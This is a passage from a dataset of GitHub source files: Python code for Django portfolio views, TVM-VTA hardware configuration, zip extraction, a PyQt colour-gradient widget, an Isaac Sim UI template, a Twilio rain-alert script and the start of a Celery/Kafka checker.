PatrimonioModel\n\nfrom .relatorios.salvar_db import *\nfrom carteira.calculos.carteira_calc import Carteira\nfrom carteira.calculos.calc_vol import Volatilidade\n\nclass PatrimonioViews(viewsets.ModelViewSet):\n queryset = PatrimonioModel.objects.all()\n serializer_class = PatrimonioSerializers\n\n def list(self, request):\n queryset = self.queryset.filter(usuario = request.user)\n serializer = PatrimonioSerializers(queryset, many=True)\n return Response(serializer.data)\n\n def perform_create(self, serializer):\n serializer.save(usuario=self.request.user)\n\n\n\nclass RelatorioPatrimonioViews(viewsets.ViewSet):\n queryset = PatrimonioModel.objects.all()\n serializer_class = PatrimonioSerializers\n\n\n def list(self, request):\n compra_model_user = CompraModel.objects.filter(usuario=request.user)\n venda_model_user = VendaModel.objects.filter(usuario=request.user)\n carteira = Carteira(compra_model_user, venda_model_user)\n candle_carteira = carteira.candle_patrimonio_diario()\n vol = Volatilidade(candle_carteira, len(self.queryset))\n \n return Response(\n {\n 'volatilidade':vol.resposta_classe(),\n 'candle_carteira':candle_carteira,\n }\n )\n","repo_name":"ribeirosaimon/Planilha_Django","sub_path":"relatorio_carteira/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7004519064","text":"import os\nimport sys\nimport json\nimport argparse\n\n\ndef pkg_config(cfg):\n \"\"\"Returns PkgConfig pkg config object.\"\"\"\n pkg_config_py = os.path.join(\n os.path.dirname(os.path.abspath(os.path.expanduser(__file__))),\n \"pkg_config.py\"\n )\n libpkg = {\"__file__\": pkg_config_py}\n exec(compile(open(pkg_config_py, \"rb\").read(), pkg_config_py, \"exec\"), libpkg, libpkg)\n PkgConfig = libpkg[\"PkgConfig\"]\n return PkgConfig(cfg)\n\ndef gen_target_name(pkg):\n \"\"\"Emit target macro from config\"\"\"\n if pkg.TARGET == \"pynq\":\n return \"VTA_TARGET_PYNQ\"\n elif pkg.TARGET == \"de10nano\":\n return \"VTA_TARGET_DE10_NANO\"\n elif pkg.TARGET == \"ultra96\":\n return \"VTA_TARGET_ULTRA96\"\n elif pkg.TARGET == \"zcu104\":\n return \"VTA_TARGET_ZCU104\"\n else:\n return None\n\ndef gen_target_cflags(pkg):\n \"\"\"Emit target cflags from config\"\"\"\n cflags_str = \" \".join(pkg.cflags)\n target = gen_target_name(pkg)\n if target:\n cflags_str += \" -D{}\".format(target)\n return cflags_str\n\ndef calculate_num_wgt_uram(pkg):\n \"\"\"Calculate number of weight uram from config\"\"\"\n if hasattr(pkg, 'num_wgt_mem_uram'):\n return pkg.num_wgt_mem_uram\n else:\n return 0\n\ndef gen_tcl_vivado(pkg, file):\n \"\"\"Export variables to tcl file\"\"\"\n const_func = \"\"\"proc const {name value} {\n uplevel 1 [list set $name $value]\n uplevel 1 [list trace var $name w {error constant ;#} ]\n}\"\"\"\n with open(file, \"w\") as fo:\n fo.write(const_func)\n fo.write(\"\\nconst CFLAGS \\\"{}\\\"\".format(gen_target_cflags(pkg)))\n fo.write(\"\\nconst TARGET {}\".format(pkg.TARGET))\n fo.write(\"\\nconst FPGA_DEVICE {}\".format(pkg.fpga_device))\n fo.write(\"\\nconst FPGA_FAMILY {}\".format(pkg.fpga_family))\n fo.write(\"\\nconst FPGA_BOARD {}\".format(pkg.fpga_board))\n fo.write(\"\\nconst FPGA_BOARD_REV {}\".format(pkg.fpga_board_rev))\n fo.write(\"\\nconst FPGA_PERIOD {}\".format(pkg.fpga_per))\n fo.write(\"\\nconst FPGA_FREQ {}\".format(pkg.fpga_freq))\n fo.write(\"\\nconst INP_MEM_AXI_RATIO {}\".format(pkg.inp_mem_axi_ratio))\n fo.write(\"\\nconst WGT_MEM_AXI_RATIO {}\".format(pkg.wgt_mem_axi_ratio))\n fo.write(\"\\nconst OUT_MEM_AXI_RATIO {}\".format(pkg.out_mem_axi_ratio))\n fo.write(\"\\nconst INP_MEM_BANKS {}\".format(pkg.inp_mem_banks))\n fo.write(\"\\nconst WGT_MEM_BANKS {}\".format(pkg.wgt_mem_banks))\n fo.write(\"\\nconst OUT_MEM_BANKS {}\".format(pkg.out_mem_banks))\n fo.write(\"\\nconst INP_MEM_WIDTH {}\".format(pkg.inp_mem_width))\n fo.write(\"\\nconst WGT_MEM_WIDTH {}\".format(pkg.wgt_mem_width))\n fo.write(\"\\nconst OUT_MEM_WIDTH {}\".format(pkg.out_mem_width))\n fo.write(\"\\nconst INP_MEM_DEPTH {}\".format(pkg.inp_mem_depth))\n fo.write(\"\\nconst WGT_MEM_DEPTH {}\".format(pkg.wgt_mem_depth))\n fo.write(\"\\nconst OUT_MEM_DEPTH {}\".format(pkg.out_mem_depth))\n fo.write(\"\\nconst NUM_WGT_MEM_URAM {}\".format(calculate_num_wgt_uram(pkg)))\n fo.write(\"\\nconst AXI_CACHE_BITS {}\".format(pkg.axi_cache_bits))\n fo.write(\"\\nconst AXI_PROT_BITS {}\".format(pkg.axi_prot_bits))\n fo.write(\"\\nconst IP_REG_MAP_RANGE {}\".format(pkg.ip_reg_map_range))\n fo.write(\"\\nconst FETCH_BASE_ADDR {}\".format(pkg.fetch_base_addr))\n fo.write(\"\\nconst LOAD_BASE_ADDR {}\".format(pkg.load_base_addr))\n fo.write(\"\\nconst COMPUTE_BASE_ADDR {}\".format(pkg.compute_base_addr))\n fo.write(\"\\nconst STORE_BASE_ADDR {}\".format(pkg.store_base_addr))\n\ndef main():\n \"\"\"Main funciton\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--use-cfg\", type=str, default=\"\",\n help=\"path to the config json\")\n parser.add_argument(\"--cflags\", action=\"store_true\",\n help=\"print the cflags\")\n parser.add_argument(\"--defs\", action=\"store_true\",\n help=\"print the macro defs\")\n parser.add_argument(\"--sources\", action=\"store_true\",\n help=\"print the source file paths\")\n parser.add_argument(\"--update\", action=\"store_true\",\n help=\"Print out the json option.\")\n parser.add_argument(\"--ldflags\", action=\"store_true\",\n help=\"print the ldflags\")\n parser.add_argument(\"--cfg-json\", action=\"store_true\",\n help=\"print all the config json\")\n parser.add_argument(\"--save-cfg-json\", type=str, default=\"\",\n help=\"save config json to file\")\n parser.add_argument(\"--target\", action=\"store_true\",\n help=\"print the target\")\n parser.add_argument(\"--cfg-str\", action=\"store_true\",\n help=\"print the configuration string\")\n parser.add_argument(\"--get-inp-mem-banks\", action=\"store_true\",\n help=\"returns number of input memory banks\")\n parser.add_argument(\"--get-inp-mem-width\", action=\"store_true\",\n help=\"returns input memory read/write port width\")\n parser.add_argument(\"--get-inp-mem-depth\", action=\"store_true\",\n help=\"returns input memory depth\")\n parser.add_argument(\"--get-inp-mem-axi-ratio\", action=\"store_true\",\n help=\"returns ratio between input element width and axi width\")\n parser.add_argument(\"--get-wgt-mem-banks\", action=\"store_true\",\n help=\"returns number of weight memory banks\")\n parser.add_argument(\"--get-wgt-mem-width\", action=\"store_true\",\n help=\"returns weight memory read/write port width\")\n parser.add_argument(\"--get-wgt-mem-depth\", action=\"store_true\",\n help=\"returns weight memory depth\")\n parser.add_argument(\"--get-wgt-mem-axi-ratio\", action=\"store_true\",\n help=\"returns ratio between weight element width and axi width\")\n parser.add_argument(\"--get-out-mem-banks\", action=\"store_true\",\n help=\"returns number of output memory banks\")\n parser.add_argument(\"--get-out-mem-width\", action=\"store_true\",\n help=\"returns output memory read/write port width\")\n parser.add_argument(\"--get-out-mem-depth\", action=\"store_true\",\n help=\"returns output memory depth\")\n parser.add_argument(\"--get-out-mem-axi-ratio\", action=\"store_true\",\n help=\"returns ratio between output element width and axi width\")\n parser.add_argument(\"--get-num-wgt-mem-uram\", action=\"store_true\",\n help=\"returns number of weight memory blocks to be implemented on URAM\")\n parser.add_argument(\"--get-axi-cache-bits\", action=\"store_true\",\n help=\"returns AXI system ARCACHE/AWCACHE hardcoded bit value\")\n parser.add_argument(\"--get-axi-prot-bits\", action=\"store_true\",\n help=\"returns AXI system ARPROT/AWPROT hardcoded bit value\")\n parser.add_argument(\"--get-ip-reg-map-range\", action=\"store_true\",\n help=\"returns ip register map address range\")\n parser.add_argument(\"--get-fetch-base-addr\", action=\"store_true\",\n help=\"returns fetch module base address\")\n parser.add_argument(\"--get-load-base-addr\", action=\"store_true\",\n help=\"returns load module base address\")\n parser.add_argument(\"--get-compute-base-addr\", action=\"store_true\",\n help=\"returns compute module base address\")\n parser.add_argument(\"--get-store-base-addr\", action=\"store_true\",\n help=\"returns store module base address\")\n parser.add_argument(\"--get-fpga-dev\", action=\"store_true\",\n help=\"returns FPGA device target\")\n parser.add_argument(\"--get-fpga-board\", action=\"store_true\",\n help=\"returns FPGA board\")\n parser.add_argument(\"--get-fpga-board-rev\", action=\"store_true\",\n help=\"returns FPGA board version\")\n parser.add_argument(\"--get-fpga-family\", action=\"store_true\",\n help=\"returns FPGA device family\")\n parser.add_argument(\"--get-fpga-freq\", action=\"store_true\",\n help=\"returns FPGA frequency\")\n parser.add_argument(\"--get-fpga-per\", action=\"store_true\",\n help=\"returns HLS target clock period\")\n parser.add_argument(\"--export-tcl\", type=str, default=\"\",\n help=\"export variables to tcl file\")\n args = parser.parse_args()\n\n if len(sys.argv) == 1:\n parser.print_help()\n return\n\n # Path to vta config\n curr_path = os.path.dirname(\n os.path.abspath(os.path.expanduser(__file__)))\n\n path_list = [\n \"vta_config.json\", os.path.join(curr_path, \"vta_config.json\")\n ]\n\n if args.use_cfg:\n path_list = [args.use_cfg]\n\n ok_path_list = [p for p in path_list if os.path.exists(p)]\n if not ok_path_list:\n raise RuntimeError(\"Cannot find config in %s\" % str(path_list))\n\n cfg = json.load(open(ok_path_list[0]))\n pkg = pkg_config(cfg)\n\n if args.target:\n print(pkg.TARGET)\n\n if args.defs:\n print(\" \".join(pkg.macro_defs))\n\n if args.sources:\n print(\" \".join(pkg.lib_source))\n\n if args.cflags:\n print(gen_target_cflags(pkg))\n\n if args.ldflags:\n print(\" \".join(pkg.ldflags))\n\n if args.cfg_json:\n print(pkg.cfg_json)\n\n if args.save_cfg_json:\n with open(args.save_cfg_json, \"w\") as fo:\n fo.write(pkg.cfg_json)\n\n if args.cfg_str:\n print(pkg.TARGET + \"_\" + pkg.bitstream)\n\n if args.get_inp_mem_banks:\n print(pkg.inp_mem_banks)\n\n if args.get_inp_mem_width:\n print(pkg.inp_mem_width)\n\n if args.get_inp_mem_depth:\n print(pkg.inp_mem_depth)\n\n if args.get_inp_mem_axi_ratio:\n print(pkg.inp_mem_axi_ratio)\n\n if args.get_wgt_mem_banks:\n print(pkg.wgt_mem_banks)\n\n if args.get_wgt_mem_width:\n print(pkg.wgt_mem_width)\n\n if args.get_wgt_mem_depth:\n print(pkg.wgt_mem_depth)\n\n if args.get_wgt_mem_axi_ratio:\n print(pkg.wgt_mem_axi_ratio)\n\n if args.get_out_mem_banks:\n print(pkg.out_mem_banks)\n\n if args.get_out_mem_width:\n print(pkg.out_mem_width)\n\n if args.get_out_mem_depth:\n print(pkg.out_mem_depth)\n\n if args.get_out_mem_axi_ratio:\n print(pkg.out_mem_axi_ratio)\n\n if args.get_num_wgt_mem_uram:\n print(calculate_num_wgt_uram(pkg))\n\n if args.get_axi_cache_bits:\n print(pkg.axi_cache_bits)\n\n if args.get_axi_prot_bits:\n print(pkg.axi_prot_bits)\n\n if args.get_ip_reg_map_range:\n print(pkg.ip_reg_map_range)\n\n if args.get_fetch_base_addr:\n print(pkg.fetch_base_addr)\n\n if args.get_load_base_addr:\n print(pkg.load_base_addr)\n\n if args.get_compute_base_addr:\n print(pkg.compute_base_addr)\n\n if args.get_store_base_addr:\n print(pkg.store_base_addr)\n\n if args.get_fpga_dev:\n print(pkg.fpga_device)\n\n if args.get_fpga_family:\n print(pkg.fpga_family)\n\n if args.get_fpga_board:\n print(pkg.fpga_board)\n\n if args.get_fpga_board_rev:\n print(pkg.fpga_board_rev)\n\n if args.get_fpga_freq:\n print(pkg.fpga_freq)\n\n if args.get_fpga_per:\n print(pkg.fpga_per)\n\n if args.export_tcl:\n gen_tcl_vivado(pkg, args.export_tcl)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"apache/tvm-vta","sub_path":"config/vta_config.py","file_name":"vta_config.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"48"} +{"seq_id":"29116367561","text":"\"Extract files archive in zip folder\"\nfrom pathlib import Path\nimport zipfile\n\ndef extract_files(directory):\n \"extract files from zip file to specified path\"\n root_dir = Path(directory)\n\n # check for zip file one level deep in directory (use rglob for more levels)\n for path in root_dir.glob('*.zip'):\n # read zip file and create path name for extracted files\n with zipfile.ZipFile(path, 'r') as zf:\n final_path = root_dir/ Path(path.stem)\n zf.extractall(path=final_path)\n","repo_name":"Inge-bot/automation_with_python","sub_path":"pathlib/extract_zip.py","file_name":"extract_zip.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10443616815","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\nimport numpy as np\nfrom scipy import interpolate\n\nclass GradientItem(QtWidgets.QGraphicsView):\n\n sigDoubleClick = QtCore.pyqtSignal()\n sigGradientChanged = QtCore.pyqtSignal(object)\n\n def __init__(self, orientation='horizontal', **kargs):\n super(GradientItem, self).__init__()\n self.orientation = orientation\n self.length = 100\n self.maxDim = 10\n self.rectSize = 10\n self.B = 0.5\n self.C = 1.0\n self.G = 1.0\n self.Angle = 0\n\n defaultColmap = [[0.0, [0, 0, 0, 255]], [1.0, [255, 255, 255, 255]]]\n self.setupColmap(defaultColmap)\n\n self.orientations = {'horizontal': (0, 1, 1), 'vertical': (90, 1, 1)}\n\n self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n\n self.scene = QtWidgets.QGraphicsScene()\n self.setScene(self.scene)\n\n # self.gradRect = QtGui.QGraphicsRectItem(QtCore.QRectF(0, self.rectSize, 100, self.rectSize))\n # self.backgroundRect = QtGui.QGraphicsRectItem(QtCore.QRectF(0, -self.rectSize, 100, self.rectSize))\n # self.backgroundRect.setBrush(QtGui.QBrush(QtCore.Qt.DiagCrossPattern))\n #\n self.setOrientation(orientation)\n\n # self.backgroundRect.setParentItem(self)\n # self.gradRect.setParentItem(self)\n\n self.setMaxDim(self.rectSize)\n\n self.updateGradient()\n\n def paint(self, p, opt, widget):\n return\n\n def mouseDoubleClickEvent(self, ev):\n self.sigDoubleClick.emit()\n\n def keyPressEvent(self, ev):\n ev.ignore()\n\n def setMaxDim(self, mx=None):\n if mx is None:\n mx = self.maxDim\n else:\n self.maxDim = mx\n\n if self.orientation == 'horizontal':\n self.setFixedHeight(mx)\n self.setMaximumWidth(16777215)\n else:\n self.setFixedWidth(mx)\n self.setMaximumHeight(16777215)\n\n def setFixedHeight(self, h):\n self.setMaximumHeight(h)\n self.setMinimumHeight(h)\n\n def setFixedWidth(self, h):\n self.setMaximumWidth(h)\n self.setMinimumWidth(h)\n\n def height(self):\n return self.geometry().height()\n\n def width(self):\n return self.geometry().width()\n\n def setOrientation(self, orientation):\n self.orientation = orientation\n self.setMaxDim()\n self.resetTransform()\n ort = orientation\n if ort == 'horizontal':\n self.translate(0, self.height()-1)\n elif ort == 'vertical':\n self.rotate(270)\n self.scale(1, -1)\n self.translate(-self.height()-1, 0)\n else:\n raise Exception(\"%s is not a valid orientation. Options are \\\n 'horizontal', and 'vertical'\" % str(ort))\n\n def widgetLength(self):\n if self.orientation == 'horizontal':\n return self.width()\n else:\n return self.height()\n\n def resizeEvent(self, ev):\n wlen = max(40, self.widgetLength())\n self.setLength(wlen-2)\n self.setOrientation(self.orientation)\n\n def setLength(self, newLen):\n self.length = float(newLen)\n # self.backgroundRect.setRect(1, -self.rectSize, newLen, self.rectSize)\n # self.gradRect.setRect(1, -self.rectSize, newLen, self.rectSize)\n self.updateGradient()\n\n def mouseClickEvent(self, ev):\n # add double click event to reset?\n pass\n\n def updateGradient(self):\n self.gradient = self.getGradient()\n # self.gradRect.setBrush(QtGui.QBrush(self.gradient))\n self.scene.setBackgroundBrush(QtGui.QBrush(self.gradient))\n self.scene.setSceneRect(QtCore.QRectF(0.0, 0, self.length, self.length))\n # self.setBackgroundBrush(QtGui.QBrush(self.gradient))\n self.sigGradientChanged.emit(self)\n\n def getGradient(self):\n \"\"\"Return a QLinearGradient object.\"\"\"\n g = QtGui.QLinearGradient(QtCore.QPointF(0, 0),\n QtCore.QPointF(self.length, 0))\n stops = self.stops\n g.setStops([(x, QtGui.QColor(t[0], t[1], t[2])) for x, t in stops])\n return g\n\n def changeColmap(self, cmap):\n self.setupColmap(cmap)\n self.doBCG()\n\n def setupColmap(self, cmap):\n self.origStops = []\n self.stops = []\n\n p = []\n r = []\n g = []\n b = []\n a = []\n\n if type(cmap) == np.ndarray and cmap.shape == (256, 4):\n for i in range(256):\n p.append(i / 255.0)\n r.append(cmap[i, 0])\n g.append(cmap[i, 1])\n b.append(cmap[i, 2])\n a.append(cmap[i, 3])\n else:\n for x, t in cmap:\n p.append(x)\n r.append(t[0])\n g.append(t[1])\n b.append(t[2])\n a.append(t[3])\n\n self.r_interp = interpolate.interp1d(p, r)\n self.g_interp = interpolate.interp1d(p, g)\n self.b_interp = interpolate.interp1d(p, b)\n self.a_interp = interpolate.interp1d(p, a)\n\n p = np.linspace(0.0, 1.0, 256)\n\n r = self.r_interp(p)\n g = self.g_interp(p)\n b = self.b_interp(p)\n a = self.a_interp(p)\n\n for i, j, k, l, m in zip(p, r, g, b, a):\n self.origStops.append([i, [j, k, l, m]])\n\n self.stops = self.origStops.copy()\n\n def updateBCG(self, B, C, G):\n self.B = B\n self.C = C\n self.G = G\n self.doBCG()\n\n def doBCG(self):\n grid = []\n p = []\n r = []\n g = []\n b = []\n a = []\n\n for x, t in self.origStops:\n xt = x**self.G\n xn = self.C*(xt-self.B)+0.5\n grid.append(xn)\n\n grid = np.clip(grid, 0.0, 1.0)\n\n p = np.linspace(0.0, 1.0, 256)\n\n r = self.r_interp(grid)\n g = self.g_interp(grid)\n b = self.b_interp(grid)\n a = self.a_interp(grid)\n\n self.stops = [[i, [j, k, l, m]] for i, j, k, l, m in zip(p, r, g, b, a)]\n\n self.updateGradient()\n\n def updateAngle(self, Angle):\n self.Angle = Angle\n self.doAngle()\n\n def doAngle(self):\n c = [i[1] for i in self.origStops]\n i = round((self.Angle / 360) * 255)\n cols = c[i:] + c[:i]\n\n p = np.linspace(0.0, 1.0, 256)\n\n self.stops = [[j, k] for j, k in zip(p, cols)]\n\n self.updateGradient()\n\n def getLookupTable(self, nPts, alpha=False, original=False):\n if alpha:\n table = np.empty((nPts, 4), dtype=np.ubyte)\n else:\n table = np.empty((nPts, 3), dtype=np.ubyte)\n\n for i in range(nPts):\n x = float(i)/(nPts-1)\n color = self.getColor(x, toQColor=False, original=original)\n table[i] = color[:table.shape[1]]\n\n return table\n\n def getColor(self, x, toQColor=True, original=False):\n if original:\n stops = self.origStops\n else:\n stops = self.stops\n\n if x <= stops[0][0]:\n c = stops[0][1]\n if toQColor:\n # always copy colors before handing them out\n return QtGui.QColor(c)\n else:\n return c[0], c[1], c[2], c[3]\n if x >= stops[-1][0]:\n c = stops[-1][1]\n if toQColor:\n # always copy colors before handing them out\n return QtGui.QColor(c)\n else:\n return c[0], c[1], c[2], c[3]\n\n x2 = stops[0][0]\n for i in range(1, len(stops)):\n x1 = x2\n x2 = stops[i][0]\n if x1 <= x <= x2:\n break\n\n dx = x2 - x1\n if dx == 0:\n f = 0.\n else:\n f = (x-x1) / dx\n c1 = stops[i-1][1] # colour\n c2 = stops[i][1]\n # if self.colorMode == 'rgb':\n r = c1[0] * (1.-f) + c2[0] * f\n g = c1[1] * (1.-f) + c2[1] * f\n b = c1[2] * (1.-f) + c2[2] * f\n a = c1[3] * (1.-f) + c2[3] * f\n if toQColor:\n return QtGui.QColor(int(r), int(g), int(b), int(a))\n else:\n return (r, g, b, a)\n","repo_name":"JJPPeters/EMPeaks","sub_path":"src/GUI/Controls/ImageInfoWidget/gradient_item.py","file_name":"gradient_item.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74456226064","text":"import omni.ui as ui\n\nfrom omni.isaac.ui.element_wrappers import (\n FloatField,\n IntField,\n StringField,\n CheckBox,\n DropDown,\n CollapsableFrame,\n TextBlock,\n ColorPicker,\n Button,\n StateButton,\n)\n\nfrom omni.isaac.ui.ui_utils import get_style\n\nfrom typing import List\nimport os\n\n\nclass UIBuilder:\n def __init__(self):\n # Frames are sub-windows that can contain multiple UI elements\n self.frames = []\n\n # UI elements created using a UIElementWrapper from omni.isaac.ui.element_wrappers\n self.wrapped_ui_elements = []\n\n ###################################################################################\n # The Functions Below Are Called Automatically By extension.py\n ###################################################################################\n\n def on_menu_callback(self):\n \"\"\"Callback for when the UI is opened from the toolbar. \n This is called directly after build_ui().\n \"\"\"\n pass\n\n def on_timeline_event(self, event):\n \"\"\"Callback for Timeline events (Play, Pause, Stop)\n\n Args:\n event (omni.timeline.TimelineEventType): Event Type\n \"\"\"\n pass\n\n def on_physics_step(self, step):\n \"\"\"Callback for Physics Step.\n Physics steps only occur when the timeline is playing\n \n Args:\n step (float): Size of physics step\n \"\"\"\n pass\n\n def on_stage_event(self, event):\n \"\"\"Callback for Stage Events\n\n Args:\n event (omni.usd.StageEventType): Event Type\n \"\"\"\n pass\n\n def cleanup(self):\n \"\"\"\n Called when the stage is closed or the extension is hot reloaded.\n Perform any necessary cleanup such as removing active callback functions\n Buttons imported from omni.isaac.ui.element_wrappers implement a cleanup function that should be called\n \"\"\"\n # None of the UI elements in this template actually have any internal state that needs to be cleaned up.\n # But it is best practice to call cleanup() on all wrapped UI elements to simplify development.\n for ui_elem in self.wrapped_ui_elements:\n ui_elem.cleanup()\n\n def build_ui(self):\n \"\"\"\n Build a custom UI tool to run your extension. \n This function will be called any time the UI window is closed and reopened.\n \"\"\"\n # Create a UI frame that prints the latest UI event.\n self._create_status_report_frame()\n\n # Create a UI frame demonstrating simple UI elements for user input\n self._create_simple_editable_fields_frame()\n\n # Create a UI frame with different button types\n self._create_buttons_frame()\n\n # Create a UI frame with different selection widgets\n self._create_selection_widgets_frame()\n\n def _create_status_report_frame(self):\n self._status_report_frame = CollapsableFrame(\"Status Report\", collapsed=False)\n with self._status_report_frame:\n with ui.VStack(style=get_style(), spacing=5, height=0):\n self._status_report_field = TextBlock(\n \"Last UI Event\",\n num_lines=3,\n tooltip=\"Prints the latest change to this UI\",\n include_copy_button=True,\n )\n\n def _create_simple_editable_fields_frame(self):\n self._simple_fields_frame = CollapsableFrame(\"Simple Editable Fields\", collapsed=False)\n\n with self._simple_fields_frame:\n with ui.VStack(style=get_style(), spacing=5, height=0):\n int_field = IntField(\n \"Int Field\",\n default_value=1,\n tooltip=\"Type an int or click and drag to set a new value.\",\n lower_limit=-100,\n upper_limit=100,\n on_value_changed_fn=self._on_int_field_value_changed_fn,\n )\n self.wrapped_ui_elements.append(int_field)\n\n float_field = FloatField(\n \"Float Field\",\n default_value=1.0,\n tooltip=\"Type a float or click and drag to set a new value.\",\n step=0.5,\n format=\"%.2f\",\n lower_limit=-100.0,\n upper_limit=100.0,\n on_value_changed_fn=self._on_float_field_value_changed_fn,\n )\n self.wrapped_ui_elements.append(float_field)\n\n def is_usd_or_python_path(file_path: str):\n # Filter file paths shown in the file picker to only be USD or Python files\n _, ext = os.path.splitext(file_path.lower())\n return ext == \".usd\" or ext == \".py\"\n\n string_field = StringField(\n \"String Field\",\n default_value=\"Type Here or Use File Picker on the Right\",\n tooltip=\"Type a string or use the file picker to set a value\",\n read_only=False,\n multiline_okay=False,\n on_value_changed_fn=self._on_string_field_value_changed_fn,\n use_folder_picker=True,\n item_filter_fn=is_usd_or_python_path,\n )\n self.wrapped_ui_elements.append(string_field)\n\n def _create_buttons_frame(self):\n buttons_frame = CollapsableFrame(\"Buttons Frame\", collapsed=False)\n\n with buttons_frame:\n with ui.VStack(style=get_style(), spacing=5, height=0):\n button = Button(\n \"Button\",\n \"CLICK ME\",\n tooltip=\"Click This Button to activate a callback function\",\n on_click_fn=self._on_button_clicked_fn,\n )\n self.wrapped_ui_elements.append(button)\n\n state_button = StateButton(\n \"State Button\",\n \"State A\",\n \"State B\",\n tooltip=\"Click this button to transition between two states\",\n on_a_click_fn=self._on_state_btn_a_click_fn,\n on_b_click_fn=self._on_state_btn_b_click_fn,\n physics_callback_fn=None, # See Loaded Scenario Template for example usage\n )\n self.wrapped_ui_elements.append(state_button)\n\n check_box = CheckBox(\n \"Check Box\",\n default_value=False,\n tooltip=\" Click this checkbox to activate a callback function\",\n on_click_fn=self._on_checkbox_click_fn,\n )\n check_box.visible = False\n self.wrapped_ui_elements.append(check_box)\n\n def _create_selection_widgets_frame(self):\n self._selection_widgets_frame = CollapsableFrame(\"Selection Widgets\", collapsed=False)\n\n with self._selection_widgets_frame:\n with ui.VStack(style=get_style(), spacing=5, height=0):\n\n def dropdown_populate_fn():\n return [\"Option A\", \"Option B\", \"Option C\"]\n\n dropdown = DropDown(\n \"Drop Down\",\n tooltip=\" Select an option from the DropDown\",\n populate_fn=dropdown_populate_fn,\n on_selection_fn=self._on_dropdown_item_selection,\n )\n self.wrapped_ui_elements.append(dropdown)\n\n dropdown.repopulate() # This does not happen automatically, and it triggers the on_selection_fn\n\n color_picker = ColorPicker(\n \"Color Picker\",\n default_value=[0.69, 0.61, 0.39, 1.0],\n tooltip=\"Select a Color\",\n on_color_picked_fn=self._on_color_picked,\n )\n self.wrapped_ui_elements.append(color_picker)\n\n ######################################################################################\n # Functions Below This Point Are Callback Functions Attached to UI Element Wrappers\n ######################################################################################\n\n def _on_int_field_value_changed_fn(self, new_value: int):\n status = f\"Value was changed in int field to {new_value}\"\n self._status_report_field.set_text(status)\n\n def _on_float_field_value_changed_fn(self, new_value: float):\n status = f\"Value was changed in float field to {new_value}\"\n self._status_report_field.set_text(status)\n\n def _on_string_field_value_changed_fn(self, new_value: str):\n status = f\"Value was changed in string field to {new_value}\"\n self._status_report_field.set_text(status)\n\n def _on_button_clicked_fn(self):\n status = \"The Button was Clicked!\"\n self._status_report_field.set_text(status)\n\n def _on_state_btn_a_click_fn(self):\n status = \"State Button was Clicked in State A!\"\n self._status_report_field.set_text(status)\n\n def _on_state_btn_b_click_fn(self):\n status = \"State Button was Clicked in State B!\"\n self._status_report_field.set_text(status)\n\n def _on_checkbox_click_fn(self, value: bool):\n status = f\"CheckBox was set to {value}!\"\n self._status_report_field.set_text(status)\n\n def _on_dropdown_item_selection(self, item: str):\n status = f\"{item} was selected from DropDown\"\n self._status_report_field.set_text(status)\n\n def _on_color_picked(self, color: List[float]):\n formatted_color = [float(\"%0.2f\" % i) for i in color]\n status = f\"RGBA Color {formatted_color} was picked in the ColorPicker\"\n self._status_report_field.set_text(status)\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.extension_templates/template_source_files/ui_component_library/ui_builder.py","file_name":"ui_builder.py","file_ext":"py","file_size_in_byte":9765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39579994047","text":"import requests\r\n\r\nfrom twilio.rest import Client\r\n\r\nAPI_KEY = \"Your api key\"\r\nMY_LAT = 8.695\r\nMY_LON = 76.8179\r\nOWM_ENDPOINT = \"https://api.openweathermap.org/data/2.5/onecall\"\r\naccount_sid = \"your account sid\"\r\nauth_token = \"your auth token\"\r\n\r\nparameters = {\r\n \"lat\": MY_LAT,\r\n \"lon\": MY_LON,\r\n \"appid\": API_KEY,\r\n \"exclude\": \"current,minutely,daily\"\r\n}\r\n\r\n\r\nresponse = requests.get(OWM_ENDPOINT, params=parameters)\r\nresponse.raise_for_status()\r\nweather_data = response.json()\r\n\r\n# weather_data_id = weather_data[\"hourly\"][0][\"weather\"][0][\"id\"] # accessing first hour id\r\n\r\n# slicing data from json to get next 12 hours forecast\r\nweather_data_id = weather_data[\"hourly\"][:12]\r\n\r\nwill_rain = False\r\nfor hour_data in weather_data_id: # getting hold of items under weather key\r\n condition_id = hour_data[\"weather\"][0][\"id\"]\r\n if condition_id < 700: # check if both sides are int\r\n will_rain = True\r\n\r\n\r\nif will_rain:\r\n\r\n\r\n client = Client(account_sid, auth_token)\r\n\r\n message = client.messages \\\r\n .create(body=\"It's going to rain today. Bring an umbrella.\", from_=\"+19036664583\", to='your phone number')\r\n\r\n print(message.status)\r\n","repo_name":"NithinNazar/Python_Projects","sub_path":"day_35_rain_alert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30844816305","text":"import logging\nfrom typing import List\n\nimport sentry_sdk\nfrom celery import Celery\nfrom sentry_sdk.integrations.logging import LoggingIntegration\n\nfrom checker_kafka.kafka_producer.producer import CheckerProducer\nfrom configuration.config import celery_config, main_config, sentry_config, kafka_producer_config\nfrom parser.parser import parse\n\nsentry_logging = LoggingIntegration(\n level=logging.INFO, # Capture info and above as breadcrumbs\n event_level=logging.ERROR # Send errors as events\n)\n\nsentry_sdk.init(\n dsn=sentry_config()['dns'],\n integrations=[sentry_logging]\n)\n\napp = Celery(**celery_config())\n\n\n@app.on_after_configure.connect\ndef setup_periodic_tasks(sender, **kwargs):\n \"\"\"\n setup periodic tasks for celery\n \"\"\"\n logging.info('setup periodic tasks')\n cfg = main_config()\n period = cfg['period']\n sender.add_periodic_task(period, 